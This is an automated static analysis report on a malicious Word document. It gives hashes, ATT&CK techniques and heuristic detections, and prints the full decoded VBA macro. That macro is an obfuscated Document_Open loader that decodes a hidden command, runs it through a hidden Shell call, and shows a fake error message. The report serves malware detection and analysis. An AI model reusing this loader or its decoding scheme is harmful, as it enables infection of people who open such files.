Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8ef51f95aba9a36…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 72.0 KB
Created: 2016-09-01 10:55:00
Authoring application: Microsoft Office Word
First seen: 2016-10-06
MD5: 3b6c5c53a58f24980bb1528372373162
SHA-1: a5afff3efc4cc032f8a1aa6b9e5799761fdda799
SHA-256: c8ef51f95aba9a369f3bdfd8326df837bd9dd1be33ed26e18aaea989046aacbd
Risk score: 178

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic

The sample contains an obfuscated auto-exec VBA macro loader that attempts to run shell commands. Its Document_Open subroutine builds a command string from Environ and Shell calls, likely to download and execute a second-stage payload. The document body and heuristics indicate an enable-content lure, a common tactic of macro-based malware.

Heuristics (7)

  • VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
    Private Sub Document_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script:
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2565 bytes
SHA-256: 00cbcb49fbc1961e16f07a6e8df5979d699cab7c01bfc356bf69009077aa25d2

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Begin Code
Option Explicit
Private Sub Document_Open()
Dim YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC As Variant
YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC = StrReverse(Hex2Str(DecryptEPI(">CBACFBA>iCBC>A?C<@=BGBhACAg>A@=A@@=@@A<A<@=@g@=@?@j@g>A>C><C?C?BAB?BjC>A<>hC@C>B=C@A??f>G>CBACFBA>iCBC>A?C<@=BGBhACAg>A@=A@@=@@A<A<@=@g@=@?@j@g>A>C>g>CBACFBA>i@jA@?>?GA@C@?GCBC?B>AACCBAC>>j?<?A?=>i?<?@>i?>?@?>>i?<?G?=>j>j?eC<C@C@BF>C>FBABgBG@BB@B=BjBgBiCCBj@@>i>GC@BiBABGBg@?B>BAAC>iC@BA@i>iBhBAC@C?CGA?><C@B?BABeB>@j>hCCBA@i>F><BgBgBABFA?C>BACCBjA<")))
Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
Dim title As String
title = StrReverse(Hex2Str(DecryptEPI("C>BjC>C>@A><BAB?BGBBBB@j><C@BBBjC?BjC>B?BG@h><BgB=B?BGC@BGC>@?")))
Dim msg As String
Dim intResponse As Integer
msg = StrReverse(Hex2Str(DecryptEPI(">iC<CABfB?B=B>><B=><BhBjC>BB><BABgBGBB><C?BGBFC@><BAC>BjC@C?BAC>><BAC?B=BABgA<><>iBAC>BjC@C?BAC>><BjC@><C>BAB@C>Bj><BiBG><C?CCBjC>><BgB=B?BGC@BGC>B?><BCBiBGC?C?BGBh><C>Bj><C@C<CAC>C>BjB?><BAB>><BjC@><C?C>B=BAC<C<B=><C@BiBABhCAB?BjB@><C?BGBFA@")))
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For second = 1 To Len(strData) Step 2
        CryptString = CryptString & Chr$(Val(DecryptEPI(".n") & Mid$(strData, second, 2)))
    Next second
    Hex2Str = CryptString
End Function


Public Function DecryptEPI(sString As String) As String
    Dim I As Integer
    Dim sLen As Integer, sBuffer As String
    sLen = Len(sString)
    For I = 1 To sLen
        sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
    Next I
    DecryptEPI = sBuffer
End Function

Private Function Oct2Dec(Number As String) As Integer
    Dim I As Integer
    Dim sLen As String, sBuffer As Integer, iNumb As Integer
    sLen = Len(Number)
    For I = 0 To sLen
        iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
        sBuffer = sBuffer + ((8 ^ I) * iNumb)
    Next I
    Oct2Dec = sBuffer
End Function